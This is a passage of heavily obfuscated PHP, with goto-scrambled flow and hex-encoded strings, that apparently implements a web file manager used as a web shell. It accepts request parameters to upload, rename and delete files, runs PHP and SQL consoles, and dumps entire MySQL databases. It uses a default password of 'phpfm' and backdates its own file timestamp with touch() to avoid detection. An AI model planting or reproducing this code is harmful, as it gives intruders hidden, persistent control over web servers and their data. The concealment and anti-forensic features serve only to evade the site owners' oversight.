x2f\x4f\x4d\x43\65\167\151\x48\132\153\154\x32\121\x43\x43\126\x54\x6b\x4e\x2b\164\x72\164\106\x6a\x34\x5a\x53\x70\x4d\155\x61\x77\x44\x46\102\x44\x30\154\x43\x6f\x79\156\x7a\x5a\102\154\61\156\x49\x4a\152\x35\65\105\154\102\x41\60\x39\x70\x64\x76\x63\71\x62\x75\x54\x31\123\x59\113\x59\102\127\167\61\121\111\103\60\157\x4e\131\x73\152\162\x46\110\112\x70\x53\153\x76\x52\x59\163\x42\x4b\103\103\x62\115\x39\110\x4c\x4e\x39\x74\x57\x72\x62\x71\x6e\152\x55\125\x47\x5a\107\x31\x41\x68\107\x75\x49\x58\x5a\x52\x7a\x70\121\154\x33\141\x47\167\104\x32\x42\x32\x63\x5a\132\62\172\105\157\114\x37\127\x2b\165\66\161\171\101\165\x6e\132\x58\111\x4f\115\x76\121\162\x46\171\x6b\161\167\x54\151\x46\172\x42\x51\x4e\x4f\130\x6a\64\121\x4b\x7a\157\x41\113\172\x61\152\x74\x59\x49\x51\167\101\154\x76\x74\160\x6c\63\x56\65\143\70\x4d\x41\x41\101\x41\101\123\x55\126\x4f\122\x4b\65\x43\x59\x49\x49\x3d\42\x29\73\xd\xa\175\xd\xa\x40\x6d\x65\x64\151\141\x20\163\143\162\145\145\156\40\141\x6e\144\x20\50\x6d\x61\170\x2d\167\151\x64\x74\150\x3a\x37\x32\x30\160\170\x29\x7b\15\xa\40\x20\x74\141\142\x6c\145\x7b\x64\x69\x73\x70\x6c\x61\171\x3a\x62\x6c\x6f\x63\153\73\x7d\15\12\x20\x20\40\40\x23\x66\155\137\x74\x61\x62\154\x65\40\164\144\x7b\144\x69\x73\160\x6c\141\x79\x3a\151\x6e\x6c\x69\156\x65\x3b\x66\x6c\x6f\141\164\x3a\154\145\146\x74\x3b\175\xd\xa\40\40\40\x20\x23\146\155\137\164\141\142\x6c\x65\x20\164\x62\x6f\144\171\40\x74\144\72\146\151\162\163\164\55\x63\150\x69\x6c\x64\x7b\167\x69\144\164\x68\72\61\x30\x30\x25\73\x70\141\x64\x64\151\156\x67\72\x30\73\x7d\xd\xa\x20\x20\40\40\43\x66\155\x5f\164\141\x62\x6c\x65\x20\x74\x62\157\144\171\40\x74\x72\72\x6e\164\x68\55\x63\x68\x69\x6c\144\x28\62\156\53\x31\51\x7b\142\141\143\x6b\147\162\x6f\x75\156\x64\55\143\157\x6c\157\162\x3a\x23\x45\106\x45\x46\105\x46\x3b\x7d\15\xa\x20\40\40\x20\43\146\x6d\x5f\x74\x61\142\x6c\145\x20\164\142\157\144\171\x20\x74\x72\72\156\164\150\55\143\x68\151\154\x64\x28\x32\156\x29\x7b\142\141\x63\x6b\147\x72\x6f\165\x6e\x64\55\143\157\x6c\x6f\x72\x3a\x23\x44\x45\x45\63\x45\x37\73\175\xd\12\x20\40\x20\40\43\146\155\137\164\x61\x62\x6c\x65\x20\164\162\x7b\x64\x69\x73\160\x6c\x61\171\x3a\142\x6c\x6f\x63\153\x3b\146\x6c\157\141\164\x3a\x6c\x65\146\x74\73\143\x6c\x65\x61\162\72\x6c\145\146\164\73\167\x69\x64\x74\150\72\61\x30\60\45\73\175\xd\12\11\43\150\x65\x61\144\145\x72\137\x74\141\142\x6c\x65\x20\56\x72\157\167\62\x2c\40\x23\x68\x65\141\x64\145\x72\137\x74\141\x62\154\145\40\56\162\157\x77\x33\40\x7b\144\x69\x73\x70\154\141\x79\x3a\x69\156\154\151\156\x65\x3b\x66\154\157\141\164\72\x6c\x65\146\164\73\167\151\144\x74\x68\72\61\x30\x30\45\73\160\x61\144\144\x69\156\x67\x3a\60\x3b\x7d\xd\xa\x9\43\150\145\141\144\x65\x72\137\x74\x61\x62\x6c\145\40\164\x61\142\154\145\40\x74\x64\40\x7b\x64\151\x73\160\154\x61\171\72\151\156\x6c\x69\156\145\73\x66\x6c\157\141\164\72\154\x65\146\x74\x3b\175\15\12\175\xd\xa\x3c\57\163\164\x79\x6c\x65\76\xd\xa\74\x2f\x68\145\x61\144\x3e\15\12\74\x62\x6f\144\171\76\15\12"; goto LuX9A; lNAHs: echo $_REQUEST["\162\145\156\141\x6d\x65"]; goto uJ1bT; tyNF1: echo CnPB2(); goto wJqC8; QtLPf: $PhGcO .= nIHjE("\105\162\x72\157\x72\40\x6f\x63\x63\x75\162\162\145\144"); goto M2VEy; q48nI: echo "\x3c\x74\141\x62\x6c\x65\40\x63\x6c\x61\x73\163\75\42\167\x68\157\154\145\42\x3e\15\12\74\x74\162\x3e\15\12\x20\40\40\x20\x3c\164\x68\76"; goto zmhNA; vgo79: RRWXv: goto nqqEh; sR36a: if ($BXCqO == "\x73\x71\x6c") { goto KD9r8; } goto LOqcd; YdvoT: goto Q7Oil; goto Ehmxg; HgYf9: echo $PhGcO; goto lwShD; zqFfH: jOqSW: goto DdnNp; sPMnp: echo nIHJe("\x46\x69\x6c\145\x20\x6d\141\x6e\141\147\145\162") . "\40\55\x20" . $QxlDp; goto Frsoh; gt1KO: function ubl0X($HezPF, $YSK3E = false) { goto KVDal; SyHPG: SPsoL: goto wFVE5; t6L33: if (@is_dir($HezPF)) { goto tTBdy; } goto vk90b; wFVE5: b4hn2: goto t6L33; vk90b: return @unlink($HezPF); goto qoWtX; KVDal: if (!($YSK3E && @is_dir($HezPF))) { goto b4hn2; } goto PAvbG; WEdyh: foreach ($svAp8 as $bfN4t) { goto EmO0D; EmO0D: if (!($bfN4t != "\56" && $bfN4t != "\x2e\x2e")) { goto ZPsF0; } goto RJFhA; y9h9L: vHleT: goto OyJtU; RJFhA: uBL0x($HezPF . "\57" . $bfN4t, true); goto mp4my; mp4my: ZPsF0: goto y9h9L; OyJtU: } goto SyHPG; b7FtG: zd6DD: goto lxVr0; qoWtX: goto zd6DD; goto koX0N; PAvbG: $svAp8 = a8KpH($HezPF, '', '', true); goto WEdyh; koX0N: tTBdy: goto dWx7n; dWx7n: return rmdir($HezPF); goto b7FtG; lxVr0: } goto DSyOH; uKS3J: echo "\x20\174\40\74\x61\x20\x68\162\145\146\x3d\42\x6a\x61\166\x61\x73\143\162\x69\160\164\x3a\40\166\157\151\144\50\x30\51\42\40\157\x6e\143\x6c\x69\x63\x6b\x3d\x22\x76\141\x72\x20\x6f\142\152\40\x3d\40\156\145\167\x20\164\x61\142\154\x65\62\x45\x78\x63\145\x6c\50\x29\x3b\x20\x6f\x62\x6a\56\103\x72\145\141\x74\145\105\170\143\145\154\123\150\145\x65\164\50\47\x66\x6d\137\x74\x61\142\x6c\x65\x27\54\x27\145\170\x70\x6f\x72\x74\47\x29\73\42\40\164\x69\164\154\x65\75\42" . nIHJE("\104\x6f\167\x6e\154\x6f\x61\x64") . "\x20\x78\154\163\42\76\170\154\x73\74\x2f\x61\76"; goto vg9_B; aG1I0: curl_close($AU30p); goto At8ao; WFe3B: echo "\x3c\x74\x61\x62\154\145\x20\x63\154\x61\163\163\75\x22\167\150\157\154\x65\x22\x20\151\144\x3d\x22\150\x65\x61\144\x65\162\137\164\141\142\x6c\x65\x22\x20\x3e\xd\12\74\164\x72\x3e\15\xa\40\40\x20\40\74\164\150\x20\143\x6f\154\163\x70\x61\x6e\75\x22\62\42\76"; goto nrmjT; WFgig: fTAZa: goto ZbB2J; ySTM7: $kmPKX = empty($_POST["\160\x68\x70"]) ? '' : $_POST["\x70\x68\x70"]; goto bVpNa; fjpdT: $qu1x5 = preg_match("\x23\141\165\x74\150\157\x72\x69\172\141\164\151\x6f\x6e\133\x5c\x73\x5d\x3f\134\x3d\133\x5c\x73\x5d\77\x27\x5c\x7b\134\42\x28\x2e\52\x3f\x29\134\42\x5c\175\x27\73\43", $BFNGe, $JfK9U); goto Q1MTS; vzpcF: echo $BXCqO; goto qvmjO; evO0R: $qCxFq = str_replace("\173\x22" . $JfK9U[1] . "\42\175", $CDz61, $BFNGe); goto pChwZ; gSYkd: $OS8TV["\x70\x61\x73\x73\167\157\162\x64"] = isset($OS8TV["\160\x61\163\163\167\157\162\144"]) ? $OS8TV["\160\141\x73\x73\x77\x6f\162\144"] : "\x70\x68\160\146\155"; goto gpOQl; sgjo5: if (!isset($_POST["\161\x75\151\164"])) { goto x70U_; } goto YKiBT; THyyn: LVKvG: goto hE0q9; BriDk: echo "\74\x68\x33\x3e" . strtoupper($BXCqO) . "\x20" . niHjE("\122\x65\163\165\154\x74") . "\x3c\57\x68\x33\76\x3c\x70\x72\145\76" . $fJXHs($kmPKX) . "\74\x2f\160\162\x65\76"; goto slE1x; Nsj2i: Q7Oil: goto BjLU5; P7dvH: if (!empty($_FILES["\x75\x70\154\x6f\x61\144"]) && !empty($dVmsi["\x75\160\x6c\157\141\144\x5f\146\x69\154\145"])) { goto F1p0W; } goto UJMd2; VhB3g: Xwr_i: goto mdMON; l1xLc: $g21yr = $g21yr[1] + $g21yr[0]; goto B2o5Y; U2MVf: echo "\x9\x9\11\x3c\x2f\x74\x64\x3e\xd\12\x9\11\11\x3c\x74\144\76\xd\12\11\11\11"; goto tLl24; ptCby: function b793r($F0VNd) { goto vz3QD; vz3QD: $cVAhl = vsLEE(); goto kQ9G1; nK9qD: d4fKb: goto r7dZE; jW3iF: return $LO6Yt . "\x3c\x62\x72\x2f\76" . $QyrRK; goto ayKyn; rg4xK: MFggz: goto ZJvhA; Cx5H1: $BqiRP = fread($M4E7H, filesize($F0VNd)); goto ykdy3; kQ9G1: $Gdtv5 = "\73\40\12\x20\40\xa"; goto j8as3; nnvwE: foreach ($t_Upb as $QyrRK) { goto Umx7N; kehGM: YdqEW: goto qa01M; HZZwT: $P2YgN = $QyrRK; goto JgMc3; Umx7N: if (!(strlen($QyrRK) > 3)) { goto kNgtR; } goto RDp8d; Eh4Gj: kNgtR: goto kehGM; bR4d3: $N6VOg = mysqli_errno($cVAhl->yMUD4); goto u6g6r; JgMc3: iKQQw: goto Eh4Gj; u6g6r: $LO6Yt = mysqli_error($cVAhl->yMUD4); goto HZZwT; RDp8d: $QjE85 = $cVAhl->query($QyrRK); goto y9E84; y9E84: if ($QjE85) { goto iKQQw; } goto bR4d3; qa01M: } goto GF_mT; r7dZE: return nIHje("\x53\x75\143\x63\x65\x73\163") . "\40\342\200\224\40" . $F0VNd; goto rg4xK; ykdy3: $t_Upb = explode($Gdtv5, $BqiRP); goto nnvwE; j8as3: $M4E7H = fopen($F0VNd, "\162\x2b"); goto Cx5H1; myQOH: if (empty($N6VOg)) { goto d4fKb; } goto jW3iF; ayKyn: goto MFggz; goto nK9qD; GF_mT: WPOws: goto myQOH; ZJvhA: } goto Ooizh; DsY2k: d8h8l: goto JXv42; ZQMsL: function HQ6Bc($Ts30e = "\x2a", $OjQB0 = true) { goto ckkbt; k6gkF: $Gdtv5 = "\x3b\40\12\40\40\xa"; goto TRB42; VdFlB: $cVAhl = VSlEe(); goto k6gkF; TRB42: if ($Ts30e == "\52") { goto V_Lhw; } goto wuwkX; l6T9T: foreach ($Ts30e as $uw2nV) { goto u8cRs; e3Inr: $oPo2a .= "\x22\42"; goto a0dEO; mP1sn: $oPo2a .= "\xa\12\12"; goto IYSp8; ph_6k: goto A__8E; goto lIjO2; DmJxA: goto M8aSZ; goto HNCY1; j5Knb: $PxiE2 = mysqli_num_fields($QjE85); goto w6ofo; tUdvs: $oPo2a .= "\54"; goto PeWPj; pAr07: $XYAS0[$Ymcd2] = addslashes($XYAS0[$Ymcd2]); goto j4D_U; fLS88: if (!($Ymcd2 < $PxiE2 - 1)) { goto EjPBB; } goto tUdvs; fkQhr: ok0PH: goto cwwLN; hasoW: $Ymcd2++; goto DmJxA; yFCEz: $oPo2a .= "\x49\116\x53\105\122\124\x20\111\x4e\124\x4f\x20\140" . $uw2nV . "\x60\x20\x56\101\x4c\x55\105\123\50"; goto hUO63; Ygni6: $oPo2a .= "\51" . $Gdtv5; goto WAVSI; rTipL: K2AEK: goto SGq1r; xWD3D: V6tJD: goto CGOqn; hUO63: $Ymcd2 = 0; goto xTfql; xTfql: M8aSZ: goto NaOuz; gGrb4: $oPo2a = preg_replace("\x23\101\125\124\x4f\137\x49\x4e\x43\x52\x45\115\105\x4e\124\x3d\x5b\134\144\135\53\40\x23\x69\163", '', $oPo2a); goto cprQ2; IYSp8: Qw9L6: goto XmhvF; w6ofo: $oPo2a .= "\x44\122\x4f\x50\x20\x54\x41\x42\114\105\x20\x49\106\40\x45\x58\111\x53\124\123\40\140" . $uw2nV . "\x60" . $Gdtv5; goto yyAY8; PeWPj: EjPBB: goto hasoW; WAVSI: goto V6tJD; goto XEexq; lIjO2: ylXtX: goto e3Inr; sXP4J: goto K2AEK; goto fkQhr; XEexq: t_fIU: goto VpA0Z; gZAXj: if ($OjQB0) { goto mRNeB; } goto gGrb4; eR1Nc: $oPo2a .= "\42" . $XYAS0[$Ymcd2] . "\x22"; goto ph_6k; cprQ2: goto Us_Ly; goto Zpnpg; yyAY8: $LwqN7 = mysqli_fetch_row($cVAhl->query("\123\110\x4f\x57\40\103\x52\105\101\x54\105\x20\124\x41\x42\x4c\x45\40" . $uw2nV)); goto IlsMn; IlsMn: $oPo2a .= $LwqN7[1] . $Gdtv5; goto gZAXj; SGq1r: if (!($mEn5z < $PxiE2)) { goto ok0PH; } goto xWD3D; CGOqn: if (!($XYAS0 = mysqli_fetch_row($QjE85))) { goto t_fIU; } goto yFCEz; VpA0Z: $mEn5z++; goto sXP4J; GFDZR: if (!isset($XYAS0[$Ymcd2])) { goto ylXtX; } goto eR1Nc; cwwLN: Us_Ly: goto mP1sn; d_GrO: $mEn5z = 0; goto rTipL; u8cRs: $QjE85 = $cVAhl->query("\x53\x45\114\105\x43\x54\x20\52\40\106\x52\117\115\40" . $uw2nV); goto j5Knb; j4D_U: $XYAS0[$Ymcd2] = str_replace("\xa", "\134\156", $XYAS0[$Ymcd2]); goto GFDZR; HNCY1: nQeOJ: goto Ygni6; NaOuz: if (!($Ymcd2 < $PxiE2)) { goto nQeOJ; } goto pAr07; a0dEO: A__8E: goto fLS88; Zpnpg: mRNeB: goto d_GrO; XmhvF: } goto YlYTa; wuwkX: $Ts30e = is_array($Ts30e) ? $Ts30e : explode("\x2c", $Ts30e); goto yEoCe; dqO9V: fwrite($n0z_v, $oPo2a); goto xCE04; lpxW5: goto Lgbrk; goto OnI2v; rr7hu: return $HezPF . "\72\x20" . MImD1("\x64\157\x77\x6e\x6c\x6f\x61\x64", $QxlDp . $HezPF, nihjE("\104\157\x77\x6e\x6c\157\141\144"), niHJE("\x44\x6f\x77\x6e\x6c\x6f\141\x64") . "\40" . $HezPF) . "\40\x3c\141\40\150\162\x65\x66\x3d\x22\43\x22\40\164\x69\x74\x6c\x65\x3d\42" . nihje("\104\x65\154\145\164\x65") . "\40" . $HezPF . "\42\x20" . $yco3m . "\x3e" . nIhje("\104\145\x6c\145\164\145") . "\74\57\141\x3e"; goto lGXpC; uD1jt: if (!($XYAS0 = mysqli_fetch_row($QjE85))) { goto cdn90; } goto O8cDt; w5KUs: $QjE85 = $cVAhl->query("\123\x48\x4f\127\x20\x54\x41\102\x4c\105\x53"); goto StRiN; xCE04: fclose($n0z_v); goto WmHD2; YlYTa: Zdiaf: goto YU9LQ; lSh2h: V_Lhw: goto lljM7; kND9e: WV2En: goto IBv4q; OnI2v: cdn90: goto kND9e; YU9LQ: $HezPF = gmdate("\x59\55\155\55\x64\137\110\55\x69\55\x73", time()) . "\56\x73\x71\x6c"; goto cW9V4; cW9V4: $n0z_v = fopen($HezPF, "\167\53"); goto dqO9V; lljM7: $Ts30e = array(); goto w5KUs; ckkbt: global $QxlDp; goto VdFlB; StRiN: Lgbrk: goto uD1jt; yEoCe: goto WV2En; goto lSh2h; O8cDt: $Ts30e[] = $XYAS0[0]; goto lpxW5; IBv4q: $oPo2a = ''; goto l6T9T; WmHD2: $yco3m = "\157\156\103\x6c\151\x63\x6b\75\42\x69\146\50\143\157\156\x66\x69\x72\x6d\x28\x27" . Nihje("\x46\151\154\x65\x20\x73\145\154\145\x63\x74\145\144") . "\x3a\x20\134\x6e" . $HezPF . "\x2e\x20\x5c\156" . NIHJe("\x41\162\x65\x20\171\x6f\165\40\x73\x75\x72\x65\x20\171\x6f\x75\40\167\141\156\x74\x20\164\157\40\x64\145\x6c\x65\164\x65\x20\x74\x68\x69\x73\x20\x66\151\154\x65\x3f") . "\x27\51\x29\x20\x64\157\x63\165\155\145\x6e\x74\x2e\154\157\x63\x61\x74\151\157\x6e\56\x68\x72\145\x66\x20\x3d\x20\47\x3f\x64\145\154\145\164\x65\x3d" . $HezPF . "\x26\x70\x61\164\x68\x3d" . $QxlDp . "\x27\x22"; goto rr7hu; lGXpC: } goto ptCby; hvfBT: q00ly: goto vzptb; roq3Q: $HezPF = base64_decode($_GET["\x69\155\x67"]); goto ygFOf; NGHPs: echo jqmTr("\160\150\160"), jqmTr("\163\x71\154"); goto k3DNE; Qa2t4: hPvbE: goto R2JgP; VMd9T: if (!@mkdir($QxlDp . $_REQUEST["\144\151\x72\156\x61\x6d\x65"], 0777)) { goto rNQCG; } goto Nd8Qg; kdniH: echo "\11\x9\11\x3c\x66\x6f\x72\x6d\x20\x61\x63\164\151\x6f\x6e\75\x22\x22\40\155\145\164\x68\x6f\x64\x3d\x22\x70\157\163\x74\42\76\46\x6e\x62\163\x70\73\x26\156\142\x73\x70\73\46\x6e\142\x73\x70\73\xd\12\x9\x9\x9\74\151\156\x70\x75\x74\x20\156\141\x6d\145\75\x22\161\165\x69\x74\42\x20\x74\x79\160\145\x3d\42\x68\151\x64\144\145\x6e\42\x20\166\141\x6c\165\x65\x3d\x22\x31\42\76\xd\12\x9\x9\11"; goto es_UC; TDZZt: $ag5LK = $zBDAR . "\46\160\141\x74\150\x3d" . $QxlDp; goto U5_Yk; HKXwG: goto OIaay; goto z7QZg; vBmzs: echo $zBDAR; goto Qyh_Q; MQysG: $M3kdW .= "\x2e\147\x7a"; goto uah1k; dS8fi: echo "\x3c\164\x61\x62\x6c\x65\x20\x63\154\x61\x73\x73\x3d\42\x77\150\x6f\154\145\42\76\15\xa\x3c\x74\x72\76\15\xa\x20\x20\40\x20\x3c\164\150\76"; goto mw1iy; oLD6E: unlink($JV9b8); goto dIcgb; EEA2m: if (!is_file($JV9b8)) { goto VdJNf; } goto guOT8; XxJea: echo $VEMW5; goto VOeYS; gQqDS: $CDz61 = json_encode($_POST["\146\155\137\x6c\x6f\x67\x69\x6e"]); goto txHMI; LuX9A: $zBDAR = "\77\146\x6d\75\x74\x72\x75\x65"; goto beocO; JqCn3: Qj1nN: goto IM5gs; Y9uVj: echo htmlspecialchars($jXlJq); goto FXMrD; NZ9zi: $QjE85 = preg_replace("\x25\x28\74\x62\157\x64\171\56\x2a\77\76\x29\x25\x69", "\x24\61" . "\x3c\163\x74\x79\x6c\x65\x3e" . CNPB2() . "\74\x2f\x73\164\x79\154\x65\x3e" . $kvz02, $QjE85); goto eAn3Y; Bp43i: clearstatcache(); goto TDEAt; bXg53: goto WUKpu; goto urLje; SXX2d: if (empty($dVmsi["\146\x6d\137\162\x65\x73\164\157\x72\145\137\164\x69\x6d\145"])) { goto yXJvi; } goto IrtsC; SK0zR: function GMDHS($aeudG) { goto nDtsz; JVcQD: return $oPo2a; goto QdULj; nDtsz: global $dVmsi; goto o_Top; o_Top: $oPo2a = !empty($dVmsi["\x65\x6e\141\142\x6c\x65\137" . $aeudG . "\x5f\x63\x6f\x6e\x73\x6f\154\145"]) ? "\xd\12\11\11\11\x9\74\146\x6f\x72\x6d\40\40\155\145\x74\150\x6f\144\75\x22\x70\157\163\x74\42\x20\x61\x63\164\151\x6f\156\x3d\42" . M576d() . "\x22\40\163\x74\171\154\145\x3d\x22\x64\151\x73\x70\154\141\171\x3a\x69\156\x6c\151\x6e\x65\x22\x3e\15\xa\11\11\11\x9\74\151\x6e\160\x75\164\x20\164\x79\x70\145\75\x22\x73\165\x62\155\x69\164\42\40\x6e\x61\x6d\145\x3d\x22" . $aeudG . "\x72\165\156\x22\40\x76\x61\x6c\x75\145\75\42" . strtoupper($aeudG) . "\40" . niHJE("\x43\157\156\163\x6f\x6c\x65") . "\x22\x3e\15\12\11\11\x9\11\x3c\x2f\146\157\x72\x6d\76\15\xa" : ''; goto JVcQD; QdULj: } goto uE6OC; eA3cW: E9N9k($HezPF); goto zwtj_; nhuMI: p521x: goto j2JqH; HXWr1: touch(__FILE__, $NMa_c); goto XzkI3; RwUYM: echo "\x9\x9\74\57\x66\157\162\155\76\xd\12\x9\74\x2f\x74\x64\76\xd\12\x3c\x2f\164\162\x3e\xd\xa\74\x2f\x74\x61\x62\x6c\x65\x3e\xd\xa"; goto ZqR7s; uRABv: if (!($BzzRQ["\151\144"] != $q2HJ9)) { goto Q1cMq; } goto w8cxQ; vb9j_: if (!empty($_POST[$h17u3 . "\x5f\156\x65\x77\137\156\141\x6d\x65"])) { goto z3tq0; } goto ijv54; TDEAt: $VEMW5 = $zBDAR . "\46\x72\145\x6e\141\x6d\145\x3d" . $_REQUEST["\162\x65\156\141\155\x65"] . "\46\160\141\164\x68\75" . $QxlDp; goto vNqk1; c60sy: touch(__FILE__, 1415116371); goto sNkZB; sNkZB: s4weT: goto IH3BL; Q0REt: M_cvC: goto oBxVI; IBKNS: goto M_cvC; goto QPVqb; j2JqH: echo "\x3c\57\144\151\x76\x3e\xd\12\74\x73\x63\x72\x69\160\164\40\164\171\x70\145\x3d\x22\164\145\x78\x74\57\x6a\x61\166\141\x73\x63\162\x69\x70\164\x22\76\xd\xa\x66\x75\156\143\x74\x69\x6f\x6e\40\x64\x6f\167\x6e\154\x6f\141\144\137\x78\154\163\x28\x66\151\x6c\145\156\141\155\145\x2c\40\x74\x65\x78\x74\x29\x20\x7b\15\12\x9\x76\141\162\40\145\154\x65\155\x65\156\x74\x20\75\40\144\157\143\x75\x6d\145\156\164\56\143\162\145\x61\164\145\x45\x6c\145\155\145\156\x74\50\x27\141\47\x29\x3b\xd\xa\11\x65\x6c\145\155\145\156\x74\x2e\163\x65\x74\x41\x74\x74\x72\151\142\165\164\x65\50\47\x68\x72\x65\146\x27\54\x20\47\x64\x61\x74\141\72\x61\x70\x70\154\151\x63\x61\164\151\x6f\x6e\x2f\166\x6e\144\56\x6d\163\x2d\145\170\143\145\154\x3b\142\141\x73\145\66\x34\54\x27\40\53\40\164\x65\170\x74\x29\73\15\xa\11\x65\x6c\x65\155\x65\x6e\x74\x2e\x73\x65\x74\x41\164\x74\x72\151\x62\x75\x74\145\50\x27\144\x6f\x77\x6e\x6c\157\141\144\47\x2c\x20\146\x69\154\145\156\141\155\145\51\73\15\12\11\145\154\145\x6d\145\156\164\x2e\163\x74\171\154\x65\56\144\x69\163\x70\154\x61\x79\40\75\40\x27\156\157\156\x65\x27\x3b\15\12\x9\x64\x6f\143\x75\x6d\145\x6e\x74\56\x62\x6f\x64\171\x2e\x61\x70\x70\145\156\x64\103\150\x69\x6c\x64\50\x65\154\x65\x6d\x65\156\x74\51\x3b\xd\12\x9\145\154\x65\x6d\x65\x6e\164\x2e\x63\154\x69\143\x6b\50\x29\x3b\15\12\11\x64\157\x63\x75\x6d\x65\x6e\x74\x2e\x62\157\x64\171\x2e\x72\145\x6d\x6f\x76\x65\103\150\x69\154\x64\x28\145\x6c\145\155\145\156\x74\x29\73\xd\12\175\xd\12\xd\xa\146\x75\x6e\143\x74\151\157\156\x20\x62\x61\x73\145\66\x34\x5f\145\x6e\143\157\144\145\50\x6d\51\40\173\15\12\11\146\x6f\162\x20\x28\166\141\x72\x20\x6b\x20\75\x20\42\x41\x42\103\104\x45\x46\x47\x48\x49\x4a\113\114\x4d\x4e\117\120\x51\x52\x53\x54\125\126\x57\x58\x59\x5a\x61\x62\x63\144\145\x66\147\150\x69\x6a\x6b\154\155\x6e\x6f\160\x71\162\x73\164\x75\166\x77\x78\171\172\60\61\x32\x33\64\x35\x36\x37\70\x39\53\x2f\42\x2e\163\160\x6c\x69\164\50\42\42\x29\54\x20\143\54\40\144\x2c\40\150\54\x20\145\x2c\40\141\x2c\40\x67\x20\75\x20\42\x22\x2c\x20\142\x20\x3d\40\x30\54\x20\x66\54\40\x6c\x20\x3d\40\60\x3b\x20\154\40\x3c\x20\155\x2e\x6c\145\156\147\x74\150\73\x20\x2b\x2b\x6c\x29\40\173\xd\xa\11\x9\x63\40\x3d\x20\155\x2e\143\x68\141\x72\103\x6f\144\145\101\164\x28\x6c\x29\73\xd\12\11\11\151\146\40\x28\x31\x32\x38\x20\x3e\x20\143\51\40\144\40\x3d\40\x31\x3b\15\12\11\x9\145\x6c\163\x65\15\xa\x9\11\11\x66\157\x72\40\x28\x64\x20\x3d\40\62\x3b\x20\x63\x20\x3e\x3d\x20\62\x20\74\74\x20\65\40\x2a\x20\144\73\x29\x20\x2b\x2b\x64\73\xd\xa\11\x9\146\157\162\40\50\x68\x20\75\40\60\x3b\x20\x68\40\74\40\144\x3b\x20\x2b\53\x68\51\x20\x31\40\x3d\x3d\40\144\x20\x3f\40\x65\x20\x3d\40\x63\40\72\x20\x28\x65\x20\x3d\x20\x68\40\77\x20\x31\x32\70\40\72\40\x31\71\x32\54\x20\x61\x20\x3d\x20\x64\40\55\40\62\x20\x2d\x20\66\x20\52\x20\x68\54\x20\60\40\74\75\x20\141\x20\46\x26\40\50\145\x20\x2b\75\x20\x28\66\x20\x3c\x3d\40\141\x20\x3f\40\x31\x20\x3a\40\x30\x29\x20\53\40\x28\65\x20\x3c\x3d\x20\141\40\77\x20\62\40\x3a\x20\60\x29\x20\x2b\x20\50\64\40\x3c\x3d\40\x61\40\77\x20\64\x20\x3a\x20\x30\51\40\53\x20\50\x33\x20\74\x3d\40\x61\x20\x3f\40\70\40\72\40\60\x29\40\53\40\50\x32\40\x3c\x3d\x20\141\x20\77\40\x31\x36\x20\x3a\40\60\x29\x20\x2b\x20\x28\61\x20\74\x3d\40\x61\40\x3f\40\63\62\x20\72\x20\60\x29\x2c\x20\141\40\55\x3d\x20\65\x29\54\40\60\x20\76\40\x61\40\x26\46\x20\50\165\x20\75\40\x36\x20\x2a\x20\x28\x64\40\x2d\40\61\x20\x2d\x20\150\51\54\x20\x65\x20\x2b\x3d\x20\143\x20\x3e\76\40\165\x2c\x20\143\x20\55\x3d\40\x63\40\76\76\x20\x75\x20\x3c\74\40\165\51\51\x2c\40\x66\x20\75\40\142\x20\77\x20\146\x20\x3c\x3c\x20\66\40\55\x20\x62\x20\72\40\60\x2c\40\142\x20\53\75\40\62\54\x20\146\40\x2b\x3d\40\145\40\76\x3e\x20\x62\x2c\x20\147\x20\x2b\75\x20\x6b\x5b\146\x5d\x2c\40\x66\x20\x3d\x20\145\x20\x25\x20\50\61\40\x3c\74\x20\x62\51\x2c\40\66\40\75\75\x20\142\40\x26\x26\40\50\x62\x20\x3d\40\60\x2c\x20\x67\40\x2b\75\x20\153\x5b\146\x5d\51\15\12\x9\x7d\15\xa\11\x62\x20\46\46\40\x28\x67\40\53\x3d\x20\153\x5b\x66\40\74\74\x20\66\x20\55\x20\142\x5d\51\x3b\15\xa\11\162\145\164\x75\162\x6e\40\147\xd\12\x7d\15\12\xd\12\xd\12\166\141\162\40\164\x61\142\x6c\145\124\x6f\105\170\143\x65\x6c\104\141\x74\141\x20\75\x20\x28\x66\165\156\x63\x74\151\157\156\50\51\40\173\15\xa\40\x20\40\40\166\x61\x72\x20\165\x72\x69\x20\75\40\47\144\141\164\141\72\x61\160\x70\x6c\151\143\141\x74\x69\157\x6e\57\x76\156\144\56\x6d\163\55\x65\170\143\x65\154\73\142\141\x73\145\x36\64\54\47\x2c\xd\12\x20\40\x20\40\x74\145\155\x70\x6c\x61\164\145\40\75\40\x27\x3c\150\164\155\154\40\170\155\x6c\x6e\x73\x3a\x6f\75\x22\x75\x72\156\x3a\163\x63\x68\x65\x6d\x61\163\55\155\151\143\162\x6f\x73\x6f\x66\x74\55\143\x6f\155\x3a\157\x66\x66\151\143\x65\72\157\146\x66\x69\143\145\x22\x20\170\155\x6c\156\163\x3a\170\x3d\x22\165\162\156\x3a\163\x63\150\x65\155\141\163\x2d\x6d\x69\143\162\157\x73\x6f\146\x74\55\143\157\155\x3a\x6f\x66\146\151\x63\145\x3a\145\170\143\145\x6c\42\40\170\155\x6c\x6e\x73\x3d\x22\x68\x74\x74\160\72\57\x2f\167\167\x77\56\167\x33\x2e\157\x72\147\x2f\124\x52\57\122\105\x43\55\x68\164\155\x6c\64\60\42\x3e\74\x68\x65\x61\144\x3e\x3c\x21\55\55\133\x69\146\x20\147\164\x65\x20\x6d\x73\157\40\71\x5d\x3e\x3c\x78\x6d\154\x3e\74\170\72\x45\170\143\145\154\x57\x6f\162\x6b\x62\157\157\x6b\x3e\x3c\x78\x3a\105\x78\x63\x65\x6c\127\x6f\162\x6b\163\150\145\x65\164\163\x3e\x3c\x78\x3a\x45\x78\143\145\154\x57\157\162\x6b\x73\x68\145\145\164\76\x3c\x78\x3a\116\141\155\x65\76\x7b\167\x6f\x72\153\163\150\145\x65\x74\175\74\57\170\72\116\141\155\x65\x3e\74\170\72\127\157\162\153\163\x68\x65\145\x74\x4f\x70\164\x69\x6f\x6e\x73\76\x3c\170\x3a\x44\x69\x73\160\x6c\141\x79\x47\162\x69\144\154\x69\156\145\163\76\74\x2f\x78\x3a\x44\151\x73\x70\154\141\171\x47\x72\x69\144\154\151\x6e\x65\163\x3e\74\57\170\72\127\x6f\162\153\x73\150\145\x65\x74\117\x70\164\151\157\156\163\x3e\x3c\x2f\170\72\x45\x78\x63\x65\154\x57\x6f\x72\x6b\x73\x68\x65\145\164\x3e\x3c\x2f\x78\x3a\x45\x78\x63\x65\x6c\x57\157\x72\x6b\163\x68\145\145\x74\163\x3e\x3c\x2f\x78\72\x45\170\x63\145\154\x57\157\162\x6